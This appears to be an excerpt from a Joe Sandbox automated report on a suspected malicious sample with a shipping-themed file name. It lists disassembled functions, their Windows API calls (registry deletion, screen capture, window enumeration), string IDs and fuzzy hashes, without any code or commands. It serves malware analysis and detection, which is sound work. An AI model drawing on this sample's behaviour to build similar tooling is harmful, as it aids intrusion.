                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                      • API String ID: 146587525-4033151799
                                                                                      • Opcode ID: b1e374eaaa1d458aee063761217fe0112797cde2f3eeb8d522a3edc35c0aca98
                                                                                      • Instruction ID: 96951f22c13feca6e884b6fae4d2f18ea9b4bc551357cb50b1bb8483d6b836d8
                                                                                      • Opcode Fuzzy Hash: b1e374eaaa1d458aee063761217fe0112797cde2f3eeb8d522a3edc35c0aca98
                                                                                      • Instruction Fuzzy Hash: F1C1AF34208201AFD725DF14C494FAABBE5FF85318F14845CF59A8B2A2CBB5ED45CB91
                                                                                      Function 000C8D0E Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 000C8D5A
                                                                                      • GetFocus.USER32 ref: 000C8D6A
                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 000C8D75
                                                                                      • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 000C8E1D
                                                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 000C8ECF
                                                                                      • GetMenuItemCount.USER32(?), ref: 000C8EEC
                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 000C8EFC
                                                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 000C8F2E
                                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 000C8F70
                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 000C8FA1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                      • String ID: 0$p]
                                                                                      • API String ID: 1026556194-498393191
                                                                                      • Opcode ID: e6b1f79cbcebf845e547112a99f205d9191581cf5e250028b2dc5477cb59dc19
                                                                                      • Instruction ID: 1a384850197eca238cbc91ad6a4d1256e79804a3969b1575ace1fbe96f2080a5
                                                                                      • Opcode Fuzzy Hash: e6b1f79cbcebf845e547112a99f205d9191581cf5e250028b2dc5477cb59dc19
                                                                                      • Instruction Fuzzy Hash: AD818C71508301ABE750CF24C884FAF7BE9FB89314F04892DF98997292DB74D941CBA5
                                                                                      Function 000B255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDC.USER32(00000000), ref: 000B25D8
                                                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 000B25E8
                                                                                      • CreateCompatibleDC.GDI32(?), ref: 000B25F4
                                                                                      • SelectObject.GDI32(00000000,?), ref: 000B2601
                                                                                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 000B266D
                                                                                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 000B26AC
                                                                                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 000B26D0
                                                                                      • SelectObject.GDI32(?,?), ref: 000B26D8
                                                                                      • DeleteObject.GDI32(?), ref: 000B26E1
                                                                                      • DeleteDC.GDI32(?), ref: 000B26E8
                                                                                      • ReleaseDC.USER32(00000000,?), ref: 000B26F3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                      • String ID: (
                                                                                      • API String ID: 2598888154-3887548279
                                                                                      • Opcode ID: 971a587c185f335ff74c1781f4c727872590258c0ee3bf7cd271d73aa08640f3
                                                                                      • Instruction ID: 876d65c138f2d1a39dfb8c82251c390dfd0dd135ce49638b08bbf1eb2e81fef2
                                                                                      • Opcode Fuzzy Hash: 971a587c185f335ff74c1781f4c727872590258c0ee3bf7cd271d73aa08640f3
                                                                                      • Instruction Fuzzy Hash: F861F0B5D00219EFDB14CFA8D884EEEBBB5FF48310F248529E959A7250D774A9418FA0
                                                                                      Function 0006DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___free_lconv_mon.LIBCMT ref: 0006DAA1
                                                                                        • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D659
                                                                                        • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D66B
                                                                                        • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D67D
                                                                                        • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D68F
                                                                                        • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6A1
                                                                                        • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6B3
                                                                                        • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6C5
                                                                                        • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6D7
                                                                                        • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6E9
                                                                                        • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6FB
                                                                                        • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D70D
                                                                                        • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D71F
                                                                                        • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D731
                                                                                      • _free.LIBCMT ref: 0006DA96
                                                                                        • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
                                                                                        • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
                                                                                      • _free.LIBCMT ref: 0006DAB8
                                                                                      • _free.LIBCMT ref: 0006DACD
                                                                                      • _free.LIBCMT ref: 0006DAD8
                                                                                      • _free.LIBCMT ref: 0006DAFA
                                                                                      • _free.LIBCMT ref: 0006DB0D
                                                                                      • _free.LIBCMT ref: 0006DB1B
                                                                                      • _free.LIBCMT ref: 0006DB26
                                                                                      • _free.LIBCMT ref: 0006DB5E
                                                                                      • _free.LIBCMT ref: 0006DB65
                                                                                      • _free.LIBCMT ref: 0006DB82
                                                                                      • _free.LIBCMT ref: 0006DB9A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                      • String ID:
                                                                                      • API String ID: 161543041-0
                                                                                      • Opcode ID: d4cec0f93a283829c47e7855e43a06da076d4055ac0969700c7afc81fe69d696
                                                                                      • Instruction ID: 551bb117f3117c10848991871839812c617d277902a6eb395c088ae7af53544e
                                                                                      • Opcode Fuzzy Hash: d4cec0f93a283829c47e7855e43a06da076d4055ac0969700c7afc81fe69d696
                                                                                      • Instruction Fuzzy Hash: 1B315831B08604DFEB65AA79E845BAAB7EBFF40350F15442AE449D7192DF30EC80CB20
                                                                                      Function 0009365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0009369C
                                                                                      • _wcslen.LIBCMT ref: 000936A7
                                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00093797
                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 0009380C
                                                                                      • GetDlgCtrlID.USER32(?), ref: 0009385D
                                                                                      • GetWindowRect.USER32(?,?), ref: 00093882
                                                                                      • GetParent.USER32(?), ref: 000938A0
                                                                                      • ScreenToClient.USER32(00000000), ref: 000938A7
                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00093921
                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0009395D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                      • String ID: %s%u
                                                                                      • API String ID: 4010501982-679674701
                                                                                      • Opcode ID: 9c739ea9f4fcdc8c4c7389fbb61dcfb61d3b701a62bbc7808e7df98bf4d94b64
                                                                                      • Instruction ID: 88c7fbfef6435710bda7f19b3ab2e300aeba1fbb666080f69ebe9cf7073f5f9d
                                                                                      • Opcode Fuzzy Hash: 9c739ea9f4fcdc8c4c7389fbb61dcfb61d3b701a62bbc7808e7df98bf4d94b64
                                                                                      • Instruction Fuzzy Hash: 8491AD71204606AFDB19DF64C885FEAF7E8FF44350F008629F999D2191DB30AA45DF91
                                                                                      Function 00094954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00094994
                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 000949DA
                                                                                      • _wcslen.LIBCMT ref: 000949EB
                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 000949F7
                                                                                      • _wcsstr.LIBVCRUNTIME ref: 00094A2C
                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00094A64
                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00094A9D
                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00094AE6
                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00094B20
                                                                                      • GetWindowRect.USER32(?,?), ref: 00094B8B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                      • String ID: ThumbnailClass
                                                                                      • API String ID: 1311036022-1241985126
                                                                                      • Opcode ID: 8236d0a5cdd0df363d3e16c82a8176dd4e72ce613c7e76c5858f36aa3882bff2
                                                                                      • Instruction ID: 578f2f02ea53a0c183dcf1abae481083bc79ff63b7ee482a4dad64f02209ced6
                                                                                      • Opcode Fuzzy Hash: 8236d0a5cdd0df363d3e16c82a8176dd4e72ce613c7e76c5858f36aa3882bff2
                                                                                      • Instruction Fuzzy Hash: A291BE710082059FEF14CF14C985FAA77E8FF84314F048469FD899A196EB34ED46DBA2
                                                                                      Function 000C3A23 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 182windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 000C3A9D
                                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 000C3AA0
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 000C3AC7
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 000C3AEA
                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 000C3B62
                                                                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 000C3BAC
                                                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 000C3BC7
                                                                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 000C3BE2
                                                                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 000C3BF6
                                                                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 000C3C13
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$LongWindow
                                                                                      • String ID: p]
                                                                                      • API String ID: 312131281-1923361398
                                                                                      • Opcode ID: e288c12a2e98389e5cff09ec5b4f901061728430ba0d4c0d0079fc6ab5e8c090
                                                                                      • Instruction ID: a1d81d38b03c6e566e599dd2d9538a935f25e5ca9e61876364e8f88be825b3c9
                                                                                      • Opcode Fuzzy Hash: e288c12a2e98389e5cff09ec5b4f901061728430ba0d4c0d0079fc6ab5e8c090
                                                                                      • Instruction Fuzzy Hash: 5D616A75A00248AFDB10DFA8CC81FEE77F8EB09704F104199FA55A72A2D774AE85DB50
                                                                                      Function 0009DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0009DC20
                                                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0009DC46
                                                                                      • _wcslen.LIBCMT ref: 0009DC50
                                                                                      • _wcsstr.LIBVCRUNTIME ref: 0009DCA0
                                                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0009DCBC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                      • API String ID: 1939486746-1459072770
                                                                                      • Opcode ID: f8f6ccaaafb00a61b70e983badc89d21988c982c53c026a0e81609a7e111599a
                                                                                      • Instruction ID: 6b573728c68f310f5531d04b19be6fa18a9a4a48ef48f27b49dae16dcee5c821
                                                                                      • Opcode Fuzzy Hash: f8f6ccaaafb00a61b70e983badc89d21988c982c53c026a0e81609a7e111599a
                                                                                      • Instruction Fuzzy Hash: CE4144729802057AEB14AB74DC07EFF37ACEF42751F10046AFE04AA1C3EB759901A7A4
                                                                                      Function 000BCC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 000BCC64
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 000BCC8D
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 000BCD48
                                                                                        • Part of subcall function 000BCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 000BCCAA
                                                                                        • Part of subcall function 000BCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 000BCCBD
                                                                                        • Part of subcall function 000BCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 000BCCCF
                                                                                        • Part of subcall function 000BCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 000BCD05
                                                                                        • Part of subcall function 000BCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 000BCD28
                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 000BCCF3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                      • API String ID: 2734957052-4033151799
                                                                                      • Opcode ID: 69d6af0e2b6794f9bba4f85ac97cc8785739a9b7e724ef4e9a0895d87e05c03e
                                                                                      • Instruction ID: e91084eddf09d396be1db44bbc9d9849a99be5c8bc5b94296d6c8e0d83058239
                                                                                      • Opcode Fuzzy Hash: 69d6af0e2b6794f9bba4f85ac97cc8785739a9b7e724ef4e9a0895d87e05c03e
                                                                                      • Instruction Fuzzy Hash: 94316E75901129BBFB208B55DC88EFFBBBCEF56750F040169E909E2241DA349E45AAA0
                                                                                      Function 000A3D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 000A3D40
                                                                                      • _wcslen.LIBCMT ref: 000A3D6D
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 000A3D9D
                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 000A3DBE
                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 000A3DCE
                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 000A3E55
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000A3E60
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000A3E6B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                      • String ID: :$\$\??\%s
                                                                                      • API String ID: 1149970189-3457252023
                                                                                      • Opcode ID: dc04d6d74a1fce70ca38b5459a67b5a69ba91f8afac7a9f1ab36d4fb186e890f
                                                                                      • Instruction ID: 8abff16d66703022a1ae62329e431bc475fc74856214465efad1256fc3dbfae3
                                                                                      • Opcode Fuzzy Hash: dc04d6d74a1fce70ca38b5459a67b5a69ba91f8afac7a9f1ab36d4fb186e890f
                                                                                      • Instruction Fuzzy Hash: AE319272900209ABEB219BA0EC49FEF37BDEF89740F1041B5FA09D6161E77497448B64
                                                                                      Function 0009E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • timeGetTime.WINMM ref: 0009E6B4
                                                                                        • Part of subcall function 0004E551: timeGetTime.WINMM(?,?,0009E6D4), ref: 0004E555
                                                                                      • Sleep.KERNEL32(0000000A), ref: 0009E6E1
                                                                                      • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0009E705
                                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0009E727
                                                                                      • SetActiveWindow.USER32 ref: 0009E746
                                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0009E754
                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 0009E773
                                                                                      • Sleep.KERNEL32(000000FA), ref: 0009E77E
                                                                                      • IsWindow.USER32 ref: 0009E78A
                                                                                      • EndDialog.USER32(00000000), ref: 0009E79B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                      • String ID: BUTTON
                                                                                      • API String ID: 1194449130-3405671355
                                                                                      • Opcode ID: 83c500339d79cea6fa6c08803896e8ee9dda54db51e64a5dfb8f5670af2aa27f
                                                                                      • Instruction ID: 47abf56792c8fe5219ffaf1bd236b0ac23ce5b827474d25e5e1fe2581e8899ee
                                                                                      • Opcode Fuzzy Hash: 83c500339d79cea6fa6c08803896e8ee9dda54db51e64a5dfb8f5670af2aa27f
                                                                                      • Instruction Fuzzy Hash: A121A5B0204285BFFF109F60EC8DE397BA9F755748F240424F949819B1DBB6AC80EB25
                                                                                      Function 0009E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0009EA5D
                                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0009EA73
                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0009EA84
                                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0009EA96
                                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0009EAA7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: SendString$_wcslen
                                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                      • API String ID: 2420728520-1007645807
